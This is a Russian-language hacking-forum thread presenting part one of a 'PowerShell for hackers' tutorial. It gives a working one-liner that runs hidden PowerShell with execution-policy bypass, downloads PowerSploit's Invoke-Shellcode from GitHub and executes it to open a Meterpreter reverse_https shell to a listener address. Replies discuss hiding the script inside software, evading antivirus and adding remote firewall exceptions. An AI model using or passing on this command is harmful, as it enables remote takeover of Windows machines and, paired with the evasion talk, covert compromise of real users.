ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   PowerShell для хакера (часть I ) (https://forum.antichat.xyz/showthread.php?t=558495)

<~DarkNode~> 25.11.2016 00:42

Часть 1
Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптовPowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

https://forum.antichat.xyz/attachmen...88adb8516d.png

Для начало сходим на гитхаб по ссылке:

Код:


Код:

https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
https://forum.antichat.xyz/attachments/4766699/1.png

Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде

Код:


Код:

https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1
Эту ссылку мы потом используем для нашей команды PowerShell,а пока можно в скрипте в комментариях увидеть опциональные параметры и примеры для его запуска:

https://forum.antichat.xyz/attachments/4766699/3.png

Копируем урл нашего скрипта и готовим следующую команду:

Код:


Код:

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
https://forum.antichat.xyz/attachments/4766699/5.png

https://forum.antichat.xyz/attachments/4766699/6.png

Собственно говоря и все)

Запускаем данную команду и к нам прилетает метерпретер сессия)
Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок)

Всем спасибо) Продолжения следует)

Следующая часть
Все части

kot-gor 25.11.2016 18:41

добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?

Vander 25.11.2016 20:04

Цитата:


kot-gor сказал(а):

добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?


Присоединяюсь к вопросу...

<~DarkNode~> 25.11.2016 20:14

Завтра сделаю тест на детект.Сорри сегодня не успеваю)

pappa 26.11.2016 23:12

я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?

kot-gor 27.11.2016 00:14

Цитата:


pappa сказал(а):

я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?

не обязательно...

ipmann 29.11.2016 10:28

Symantec Endpoint Protection 12 этот скрипт прибивает..

kot-gor 29.11.2016 16:34

Добрый день, ну не во всех же стоит Symantec Endpoint Protection,какие то скрипты будут пробиваться..)

<~DarkNode~> 03.12.2016 01:46

Цитата:


~~DarkNode~~ сказал(а):

Завтра сделаю тест на детект.Сорри сегодня не успеваю)


Извините за редкий онлайн. Увлекся лабораторией тестирования на проникновения от PentestIT. После окончания прохождения вернусь к вам мои дорогие друзья)))

InK 04.12.2016 19:07

Огромное спасибо за статью, искал нечто подобное.


Время: 14:03